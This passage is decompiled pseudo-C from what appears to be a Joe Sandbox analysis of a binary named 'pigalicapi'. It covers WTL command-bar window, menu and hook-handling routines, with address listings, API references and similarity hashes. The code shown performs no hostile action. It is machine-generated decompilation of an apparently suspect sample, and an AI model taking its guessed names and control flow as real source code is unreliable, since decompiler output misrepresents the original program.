                                                                                                                                                                                                                                                                                          								SendMessageA( *(_t246 + 4), 0x448, _t235, 0);
                                                                                                                                                                                                                                                                                          								if( *0x8819a0 == 0) {
                                                                                                                                                                                                                                                                                          									_t133 = 0;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          									_t133 = ( ~(_v0 & 0x000000ff) & 0xffffd000) + 0x4000;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								E0080F7B0( &_v52, _v80, _t246, _v88, _t133 | 0x00000040, _v84);
                                                                                                                                                                                                                                                                                          								SendMessageA( *(_t246 + 4), 0x403, _t235, 0);
                                                                                                                                                                                                                                                                                          								_t236 =  *(_t246 + 4);
                                                                                                                                                                                                                                                                                          								if(GetFocus() != _t236) {
                                                                                                                                                                                                                                                                                          									SendMessageA(_t236, 0x448, 0xffffffff, 0);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t223 =  *(_t246 + 4);
                                                                                                                                                                                                                                                                                          								_t237 = PeekMessageA;
                                                                                                                                                                                                                                                                                          								_v116.hwnd = 0;
                                                                                                                                                                                                                                                                                          								_v116.message = 0;
                                                                                                                                                                                                                                                                                          								_v116.wParam = 0;
                                                                                                                                                                                                                                                                                          								_v116.lParam = 0;
                                                                                                                                                                                                                                                                                          								_v116.time.x = 0;
                                                                                                                                                                                                                                                                                          								_v116.pt.x = 0;
                                                                                                                                                                                                                                                                                          								_v92 = 0;
                                                                                                                                                                                                                                                                                          								 *(_t246 + 0x88) = 0xffffffff;
                                                                                                                                                                                                                                                                                          								if(PeekMessageA( &_v116,  *(_t246 + 4), 0x201, 0x201, 0) != 0) {
                                                                                                                                                                                                                                                                                          									_t223 = _v116.pt.x;
                                                                                                                                                                                                                                                                                          									_push(_v92);
                                                                                                                                                                                                                                                                                          									if(PtInRect( &_v32, _v116.pt.x) != 0) {
                                                                                                                                                                                                                                                                                          										_t223 =  &_v116;
                                                                                                                                                                                                                                                                                          										PeekMessageA( &_v116,  *(_t246 + 4), 0x201, 0x201, 1);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t238 = _t237 | 0xffffffff;
                                                                                                                                                                                                                                                                                          								if( *(_t246 + 0x8c) == _t238) {
                                                                                                                                                                                                                                                                                          									 *(_t246 + 0x84) =  *(_t246 + 0x84) & 0x000000ef;
                                                                                                                                                                                                                                                                                          									if(( *(_t246 + 0x84) & 0x00000020) != 0) {
                                                                                                                                                                                                                                                                                          										SendMessageA( *(_t246 + 4), 0x448, _v76, 0);
                                                                                                                                                                                                                                                                                          										_t144 = SendMessageA( *(_t246 + 4), 0x449, 1, 0);
                                                                                                                                                                                                                                                                                          										_pop(_t239);
                                                                                                                                                                                                                                                                                          										_pop(_t182);
                                                                                                                                                                                                                                                                                          										return E008159E6(_t144, _t182, _v16 ^ _t254,  *(_t246 + 4), _t239, _t246);
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t146 =  *(_t246 + 0x85);
                                                                                                                                                                                                                                                                                          										if((_t146 & 0x00000002) != 0 && (_t146 & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                          											 *(_t246 + 0x85) = _t146 & 0x000000f7;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										_t148 = E00811570(_t246, _t238);
                                                                                                                                                                                                                                                                                          										_pop(_t240);
                                                                                                                                                                                                                                                                                          										_pop(_t183);
                                                                                                                                                                                                                                                                                          										return E008159E6(_t148, _t183, _v16 ^ _t254, _t223, _t240, _t246);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									if( *0x8819a4 == 0) {
                                                                                                                                                                                                                                                                                          										_t186 =  *0x88196c; // 0x8819bc
                                                                                                                                                                                                                                                                                          										_t187 = _t186 + 0x10;
                                                                                                                                                                                                                                                                                          										EnterCriticalSection(_t187);
                                                                                                                                                                                                                                                                                          										if( *0x8819a4 == 0) {
                                                                                                                                                                                                                                                                                          											 *0x8819a4 = RegisterWindowMessageA("WTL_CmdBar_InternalAutoPopupMsg");
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										LeaveCriticalSection(_t187);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t206 =  *0x8819a4; // 0x0
                                                                                                                                                                                                                                                                                          									_t225 =  *(_t246 + 4);
                                                                                                                                                                                                                                                                                          									_t152 = PostMessageA( *(_t246 + 4), _t206,  *(_t246 + 0x8c) & 0x0000ffff, 0);
                                                                                                                                                                                                                                                                                          									if(( *(_t246 + 0x8c) & 0xffff0000) == 0 && ( *(_t246 + 0x84) & 0x00000008) == 0) {
                                                                                                                                                                                                                                                                                          										_t152 = PostMessageA( *(_t246 + 4), 0x100, 0x28, 0);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									 *(_t246 + 0x8c) = _t238;
                                                                                                                                                                                                                                                                                          									_pop(_t241);
                                                                                                                                                                                                                                                                                          									_pop(_t185);
                                                                                                                                                                                                                                                                                          									return E008159E6(_t152, _t185, _v16 ^ _t254, _t225, _t241, _t246);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t211 =  *( *((intOrPtr*)(_t233 + 4)) + _t192 * 4);
                                                                                                                                                                                                                                                                                          								if(_t211 == 0) {
                                                                                                                                                                                                                                                                                          									goto L25;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									return CallNextHookEx( *_t211, _a4, _a8, _a12);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L55:
                                                                                                                                                                                                                                                                                          			}































































                                                                                                                                                                                                                                                                                          0x00810af3
                                                                                                                                                                                                                                                                                          0x00810af6
                                                                                                                                                                                                                                                                                          0x00810afc
                                                                                                                                                                                                                                                                                          0x00810afe
                                                                                                                                                                                                                                                                                          0x00810b15
                                                                                                                                                                                                                                                                                          0x00810b17
                                                                                                                                                                                                                                                                                          0x00810b1d
                                                                                                                                                                                                                                                                                          0x00810b21
                                                                                                                                                                                                                                                                                          0x00810b2e
                                                                                                                                                                                                                                                                                          0x00810b3b
                                                                                                                                                                                                                                                                                          0x00810b3b
                                                                                                                                                                                                                                                                                          0x00810b41
                                                                                                                                                                                                                                                                                          0x00810b41
                                                                                                                                                                                                                                                                                          0x00810b4a
                                                                                                                                                                                                                                                                                          0x00810b4d
                                                                                                                                                                                                                                                                                          0x00810b53
                                                                                                                                                                                                                                                                                          0x00810b67
                                                                                                                                                                                                                                                                                          0x00810b6f
                                                                                                                                                                                                                                                                                          0x00810b71
                                                                                                                                                                                                                                                                                          0x00810b75
                                                                                                                                                                                                                                                                                          0x00810b80
                                                                                                                                                                                                                                                                                          0x00810b82
                                                                                                                                                                                                                                                                                          0x00810b88
                                                                                                                                                                                                                                                                                          0x00810b8c
                                                                                                                                                                                                                                                                                          0x00810b99
                                                                                                                                                                                                                                                                                          0x00810ba6
                                                                                                                                                                                                                                                                                          0x00810ba6
                                                                                                                                                                                                                                                                                          0x00810bac
                                                                                                                                                                                                                                                                                          0x00810bac
                                                                                                                                                                                                                                                                                          0x00810bb2
                                                                                                                                                                                                                                                                                          0x00810bc3
                                                                                                                                                                                                                                                                                          0x00810bcb
                                                                                                                                                                                                                                                                                          0x00810bcf
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00810bd1
                                                                                                                                                                                                                                                                                          0x00810bd7
                                                                                                                                                                                                                                                                                          0x00810be1
                                                                                                                                                                                                                                                                                          0x00810beb
                                                                                                                                                                                                                                                                                          0x00810bf6
                                                                                                                                                                                                                                                                                          0x00810c06
                                                                                                                                                                                                                                                                                          0x00810c06
                                                                                                                                                                                                                                                                                          0x00810bf6
                                                                                                                                                                                                                                                                                          0x00810be1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00810bcf
                                                                                                                                                                                                                                                                                          0x00810bd5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00810bd5
                                                                                                                                                                                                                                                                                          0x00810b53
                                                                                                                                                                                                                                                                                          0x00810c08
                                                                                                                                                                                                                                                                                          0x00810c0a
                                                                                                                                                                                                                                                                                          0x00810c10
                                                                                                                                                                                                                                                                                          0x00810c3c
                                                                                                                                                                                                                                                                                          0x00810c44
                                                                                                                                                                                                                                                                                          0x00810c12
                                                                                                                                                                                                                                                                                          0x00810c12
                                                                                                                                                                                                                                                                                          0x00810c18
                                                                                                                                                                                                                                                                                          0x00810c1e
                                                                                                                                                                                                                                                                                          0x00810c21
                                                                                                                                                                                                                                                                                          0x00810c25
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00810c27
                                                                                                                                                                                                                                                                                          0x00810c27
                                                                                                                                                                                                                                                                                          0x00810c30
                                                                                                                                                                                                                                                                                          0x00810c34
                                                                                                                                                                                                                                                                                          0x00810c35
                                                                                                                                                                                                                                                                                          0x00810c3a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00810c3a
                                                                                                                                                                                                                                                                                          0x00810c4a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00810c4c
                                                                                                                                                                                                                                                                                          0x00810c4e
                                                                                                                                                                                                                                                                                          0x00810c89
                                                                                                                                                                                                                                                                                          0x00810c8f
                                                                                                                                                                                                                                                                                          0x00810c91
                                                                                                                                                                                                                                                                                          0x00810c96
                                                                                                                                                                                                                                                                                          0x00810c9d
                                                                                                                                                                                                                                                                                          0x00810ca0
                                                                                                                                                                                                                                                                                          0x00810ca9
                                                                                                                                                                                                                                                                                          0x00810caa
                                                                                                                                                                                                                                                                                          0x00810cad
                                                                                                                                                                                                                                                                                          0x00810cb0
                                                                                                                                                                                                                                                                                          0x00810cb3
                                                                                                                                                                                                                                                                                          0x00810cba
                                                                                                                                                                                                                                                                                          0x00810cc6
                                                                                                                                                                                                                                                                                          0x00810cd4
                                                                                                                                                                                                                                                                                          0x00810cdd
                                                                                                                                                                                                                                                                                          0x00810ce0
                                                                                                                                                                                                                                                                                          0x00810cf2
                                                                                                                                                                                                                                                                                          0x00810d00
                                                                                                                                                                                                                                                                                          0x00810d03
                                                                                                                                                                                                                                                                                          0x00810d06
                                                                                                                                                                                                                                                                                          0x00810d09
                                                                                                                                                                                                                                                                                          0x00810d0f
                                                                                                                                                                                                                                                                                          0x00810d15
                                                                                                                                                                                                                                                                                          0x00810d1d
                                                                                                                                                                                                                                                                                          0x00810d24
                                                                                                                                                                                                                                                                                          0x00810d27
                                                                                                                                                                                                                                                                                          0x00810d38
                                                                                                                                                                                                                                                                                          0x00810d43
                                                                                                                                                                                                                                                                                          0x00810d46
                                                                                                                                                                                                                                                                                          0x00810d49
                                                                                                                                                                                                                                                                                          0x00810d4c
                                                                                                                                                                                                                                                                                          0x00810d4f
                                                                                                                                                                                                                                                                                          0x00810d52
                                                                                                                                                                                                                                                                                          0x00810d54
                                                                                                                                                                                                                                                                                          0x00810d5a
                                                                                                                                                                                                                                                                                          0x00810d66
                                                                                                                                                                                                                                                                                          0x00810d6c
                                                                                                                                                                                                                                                                                          0x00810d6e
                                                                                                                                                                                                                                                                                          0x00810d7d
                                                                                                                                                                                                                                                                                          0x00810d86
                                                                                                                                                                                                                                                                                          0x00810d9c
                                                                                                                                                                                                                                                                                          0x00810d88
                                                                                                                                                                                                                                                                                          0x00810d8e
                                                                                                                                                                                                                                                                                          0x00810d95
                                                                                                                                                                                                                                                                                          0x00810d95
                                                                                                                                                                                                                                                                                          0x00810db1
                                                                                                                                                                                                                                                                                          0x00810dc2
                                                                                                                                                                                                                                                                                          0x00810dc4
                                                                                                                                                                                                                                                                                          0x00810dcf
                                                                                                                                                                                                                                                                                          0x00810ddb
                                                                                                                                                                                                                                                                                          0x00810ddb
                                                                                                                                                                                                                                                                                          0x00810ddd
                                                                                                                                                                                                                                                                                          0x00810de0
                                                                                                                                                                                                                                                                                          0x00810df3
                                                                                                                                                                                                                                                                                          0x00810df6
                                                                                                                                                                                                                                                                                          0x00810df9
                                                                                                                                                                                                                                                                                          0x00810dfc
                                                                                                                                                                                                                                                                                          0x00810dff
                                                                                                                                                                                                                                                                                          0x00810e02
                                                                                                                                                                                                                                                                                          0x00810e05
                                                                                                                                                                                                                                                                                          0x00810e0d
                                                                                                                                                                                                                                                                                          0x00810e1b
                                                                                                                                                                                                                                                                                          0x00810e20
                                                                                                                                                                                                                                                                                          0x00810e23
                                                                                                                                                                                                                                                                                          0x00810e31
                                                                                                                                                                                                                                                                                          0x00810e43
                                                                                                                                                                                                                                                                                          0x00810e47
                                                                                                                                                                                                                                                                                          0x00810e47
                                                                                                                                                                                                                                                                                          0x00810e31
                                                                                                                                                                                                                                                                                          0x00810e49
                                                                                                                                                                                                                                                                                          0x00810e52
                                                                                                                                                                                                                                                                                          0x00810eea
                                                                                                                                                                                                                                                                                          0x00810ef8
                                                                                                                                                                                                                                                                                          0x00810f38
                                                                                                                                                                                                                                                                                          0x00810f47
                                                                                                                                                                                                                                                                                          0x00810f4c
                                                                                                                                                                                                                                                                                          0x00810f4f
                                                                                                                                                                                                                                                                                          0x00810f58
                                                                                                                                                                                                                                                                                          0x00810efa
                                                                                                                                                                                                                                                                                          0x00810efa
                                                                                                                                                                                                                                                                                          0x00810f02
                                                                                                                                                                                                                                                                                          0x00810f0a
                                                                                                                                                                                                                                                                                          0x00810f0a
                                                                                                                                                                                                                                                                                          0x00810f12
                                                                                                                                                                                                                                                                                          0x00810f17
                                                                                                                                                                                                                                                                                          0x00810f18
                                                                                                                                                                                                                                                                                          0x00810f26
                                                                                                                                                                                                                                                                                          0x00810f26
                                                                                                                                                                                                                                                                                          0x00810e58
                                                                                                                                                                                                                                                                                          0x00810e5f
                                                                                                                                                                                                                                                                                          0x00810e61
                                                                                                                                                                                                                                                                                          0x00810e67
                                                                                                                                                                                                                                                                                          0x00810e6b
                                                                                                                                                                                                                                                                                          0x00810e78
                                                                                                                                                                                                                                                                                          0x00810e85
                                                                                                                                                                                                                                                                                          0x00810e85
                                                                                                                                                                                                                                                                                          0x00810e8b
                                                                                                                                                                                                                                                                                          0x00810e8b
                                                                                                                                                                                                                                                                                          0x00810e98
                                                                                                                                                                                                                                                                                          0x00810e9e
                                                                                                                                                                                                                                                                                          0x00810eac
                                                                                                                                                                                                                                                                                          0x00810eb8
                                                                                                                                                                                                                                                                                          0x00810ed0
                                                                                                                                                                                                                                                                                          0x00810ed0
                                                                                                                                                                                                                                                                                          0x00810ed2
                                                                                                                                                                                                                                                                                          0x00810ed8
                                                                                                                                                                                                                                                                                          0x00810ed9
                                                                                                                                                                                                                                                                                          0x00810ee7
                                                                                                                                                                                                                                                                                          0x00810ee7
                                                                                                                                                                                                                                                                                          0x00810c54
                                                                                                                                                                                                                                                                                          0x00810c57
                                                                                                                                                                                                                                                                                          0x00810c5c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00810c5e
                                                                                                                                                                                                                                                                                          0x00810c7b
                                                                                                                                                                                                                                                                                          0x00810c7b
                                                                                                                                                                                                                                                                                          0x00810c5c
                                                                                                                                                                                                                                                                                          0x00810c4e
                                                                                                                                                                                                                                                                                          0x00810c4a
                                                                                                                                                                                                                                                                                          0x00810c25
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(008819AC), ref: 00810B21
                                                                                                                                                                                                                                                                                          • RegisterWindowMessageA.USER32(WTL_CmdBar_InternalGetBarMsg), ref: 00810B35
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(008819AC), ref: 00810B41
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(008819AC), ref: 00810B8C
                                                                                                                                                                                                                                                                                          • RegisterWindowMessageA.USER32(WTL_CmdBar_InternalGetBarMsg), ref: 00810BA0
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(008819AC), ref: 00810BAC
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00810BC0
                                                                                                                                                                                                                                                                                          • GetParent.USER32 ref: 00810BC5
                                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00810BD7
                                                                                                                                                                                                                                                                                          • IsWindow.USER32(00000000), ref: 00810BEE
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00810C06
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00810C12
                                                                                                                                                                                                                                                                                          • CallNextHookEx.USER32 ref: 00810C6D
                                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00810C89
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalMessageSection$Window$CurrentEnterLeaveRegisterSend$CallExceptionHookNextParentProcessRaiseThread
                                                                                                                                                                                                                                                                                          • String ID: WTL_CmdBar_InternalGetBarMsg
                                                                                                                                                                                                                                                                                          • API String ID: 2745667198-1327875102
                                                                                                                                                                                                                                                                                          • Opcode ID: d1ee23d11b5e415525e9f5a216c9bfe77c1c7c511a3d4ca75536cf4efe3f6ad9
                                                                                                                                                                                                                                                                                          • Instruction ID: e2868b1df3cc7f03eb0fd9dd17b320445a962eaa75ee8acaabf58c54964e320b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1ee23d11b5e415525e9f5a216c9bfe77c1c7c511a3d4ca75536cf4efe3f6ad9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90418C35601205AFDB20CF18EC98BAA77A8FF44325F608619F855D7251CBB0ACC6CFA1
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                                                                                                                          			E0080E2D0(unsigned int __ecx, intOrPtr __edx, signed char _a4, struct HMENU__* _a8, long* _a12) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                                          				char _v136;
                                                                                                                                                                                                                                                                                          				int _v140;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _v144;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _v148;
                                                                                                                                                                                                                                                                                          				intOrPtr _v152;
                                                                                                                                                                                                                                                                                          				long _v156;
                                                                                                                                                                                                                                                                                          				signed int _v160;
                                                                                                                                                                                                                                                                                          				struct tagMENUITEMINFOA _v208;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t86;
                                                                                                                                                                                                                                                                                          				signed int _t87;
                                                                                                                                                                                                                                                                                          				signed int _t93;
                                                                                                                                                                                                                                                                                          				long _t94;
                                                                                                                                                                                                                                                                                          				long _t96;
                                                                                                                                                                                                                                                                                          				long _t97;
                                                                                                                                                                                                                                                                                          				int _t99;
                                                                                                                                                                                                                                                                                          				signed int _t103;
                                                                                                                                                                                                                                                                                          				signed int _t105;
                                                                                                                                                                                                                                                                                          				signed int _t107;
                                                                                                                                                                                                                                                                                          				CHAR* _t109;
                                                                                                                                                                                                                                                                                          				int _t113;
                                                                                                                                                                                                                                                                                          				long _t118;
                                                                                                                                                                                                                                                                                          				long* _t121;
                                                                                                                                                                                                                                                                                          				void* _t122;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t123;
                                                                                                                                                                                                                                                                                          				CHAR* _t126;
                                                                                                                                                                                                                                                                                          				intOrPtr _t127;
                                                                                                                                                                                                                                                                                          				int _t128;
                                                                                                                                                                                                                                                                                          				signed int _t146;
                                                                                                                                                                                                                                                                                          				intOrPtr _t150;
                                                                                                                                                                                                                                                                                          				void* _t151;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t152;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t154;
                                                                                                                                                                                                                                                                                          				void* _t155;
                                                                                                                                                                                                                                                                                          				int _t156;
                                                                                                                                                                                                                                                                                          				signed int _t159;
                                                                                                                                                                                                                                                                                          				signed int _t163;
                                                                                                                                                                                                                                                                                          				intOrPtr _t164;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t128 = __ecx;
                                                                                                                                                                                                                                                                                          				_t161 = _t163;
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0081F2B5);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t164 = _t163 - 0xc0;
                                                                                                                                                                                                                                                                                          				_t86 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_t87 = _t86 ^ _t163;
                                                                                                                                                                                                                                                                                          				_v28 = _t87;
                                                                                                                                                                                                                                                                                          				_push(_t87);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_v20 = _t164;
                                                                                                                                                                                                                                                                                          				_t154 = _a8;
                                                                                                                                                                                                                                                                                          				_t121 = _a12;
                                                                                                                                                                                                                                                                                          				_t150 = __edx;
                                                                                                                                                                                                                                                                                          				_v152 = __edx;
                                                                                                                                                                                                                                                                                          				if(__ecx >> 0x10 == 0) {
                                                                                                                                                                                                                                                                                          					_t145 =  *((intOrPtr*)(__edx + 0x84));
                                                                                                                                                                                                                                                                                          					_t93 = _t145 >> 0x00000001 & 0x00000001;
                                                                                                                                                                                                                                                                                          					__eflags = _t93;
                                                                                                                                                                                                                                                                                          					if(_t93 != 0) {
                                                                                                                                                                                                                                                                                          						L4:
                                                                                                                                                                                                                                                                                          						__eflags = _t93;
                                                                                                                                                                                                                                                                                          						if(_t93 == 0) {
                                                                                                                                                                                                                                                                                          							__eflags = _t128;
                                                                                                                                                                                                                                                                                          							if(_t128 != 0) {
                                                                                                                                                                                                                                                                                          								L12:
                                                                                                                                                                                                                                                                                          								_t94 = _t128;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								__eflags = _t145 & 0x00000010;
                                                                                                                                                                                                                                                                                          								if((_t145 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                                                          									goto L12;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t94 = SendMessageA( *(_t150 + 4), 0x447, _t128, _t128);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t145 =  *(_t150 + 0x74);
                                                                                                                                                                                                                                                                                          							_push(_t94);
                                                                                                                                                                                                                                                                                          							_push(_t154);
                                                                                                                                                                                                                                                                                          							_push(_a4);
                                                                                                                                                                                                                                                                                          							_push( *((intOrPtr*)(_t150 + 0x5c)));
                                                                                                                                                                                                                                                                                          							_push( *(_t150 + 0x74));
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							__eflags = _t128;
                                                                                                                                                                                                                                                                                          							if(_t128 != 0) {
                                                                                                                                                                                                                                                                                          								L8:
                                                                                                                                                                                                                                                                                          								_t145 = _a4;
                                                                                                                                                                                                                                                                                          								_push(_t128);
                                                                                                                                                                                                                                                                                          								_push(_t154);
                                                                                                                                                                                                                                                                                          								_push(_a4);
                                                                                                                                                                                                                                                                                          								_push( *(_t150 + 4));
                                                                                                                                                                                                                                                                                          								_push( *((intOrPtr*)(_t150 + 0x40)));
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								__eflags = _t145 & 0x00000010;
                                                                                                                                                                                                                                                                                          								if((_t145 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                                                          									goto L8;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t118 = SendMessageA( *(_t150 + 4), 0x447, _t128, _t128);
                                                                                                                                                                                                                                                                                          									_t145 = _a4;
                                                                                                                                                                                                                                                                                          									_push(_t118);
                                                                                                                                                                                                                                                                                          									_push(_t154);
                                                                                                                                                                                                                                                                                          									_push(_a4);
                                                                                                                                                                                                                                                                                          									_push( *(_t150 + 4));
                                                                                                                                                                                                                                                                                          									_push( *((intOrPtr*)(_t150 + 0x40)));
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t96 = CallWindowProcA();
                                                                                                                                                                                                                                                                                          						__eflags =  *(_t150 + 0x84) & 0x00000004;
                                                                                                                                                                                                                                                                                          						_v156 = _t96;
                                                                                                                                                                                                                                                                                          						if(( *(_t150 + 0x84) & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                                          							L39:
                                                                                                                                                                                                                                                                                          							_t97 = _v156;
                                                                                                                                                                                                                                                                                          							goto L40;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t123 = _t154;
                                                                                                                                                                                                                                                                                          							_v144 = _t123;
                                                                                                                                                                                                                                                                                          							_t156 = 0;
                                                                                                                                                                                                                                                                                          							__eflags = 0;
                                                                                                                                                                                                                                                                                          							_v8 = 0;
                                                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                                                          								_v140 = _t156;
                                                                                                                                                                                                                                                                                          								_t99 = GetMenuItemCount(_t123);
                                                                                                                                                                                                                                                                                          								__eflags = _t156 - _t99;
                                                                                                                                                                                                                                                                                          								if(_t156 >= _t99) {
                                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								E00816820( &_v208, 0, 0x30);
                                                                                                                                                                                                                                                                                          								_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                                                                          								_v208.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          								_t103 = E00804890(_t123, _t150, _t156);
                                                                                                                                                                                                                                                                                          								__eflags = _t103;
                                                                                                                                                                                                                                                                                          								if(_t103 != 0) {
                                                                                                                                                                                                                                                                                          									_v208.cbSize = 0x2c;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t145 =  &_v208;
                                                                                                                                                                                                                                                                                          								_v208.cch = 0x64;
                                                                                                                                                                                                                                                                                          								_v208.fMask = 0x3f;
                                                                                                                                                                                                                                                                                          								_v208.dwTypeData =  &_v136;
                                                                                                                                                                                                                                                                                          								GetMenuItemInfoA(_t123, _t156, 1,  &_v208);
                                                                                                                                                                                                                                                                                          								__eflags = _v208.fType & 0x00000100;
                                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          									L37:
                                                                                                                                                                                                                                                                                          									_t156 = _v140 + 1;
                                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_push(0x14);
                                                                                                                                                                                                                                                                                          									_v208.fMask = 0x31;
                                                                                                                                                                                                                                                                                          									_v8 = 1;
                                                                                                                                                                                                                                                                                          									_t105 = E008165FC( &_v208, _t150, _t156, __eflags);
                                                                                                                                                                                                                                                                                          									_t164 = _t164 + 4;
                                                                                                                                                                                                                                                                                          									__eflags = _t105;
                                                                                                                                                                                                                                                                                          									if(_t105 == 0) {
                                                                                                                                                                                                                                                                                          										_t159 = 0;
                                                                                                                                                                                                                                                                                          										__eflags = 0;
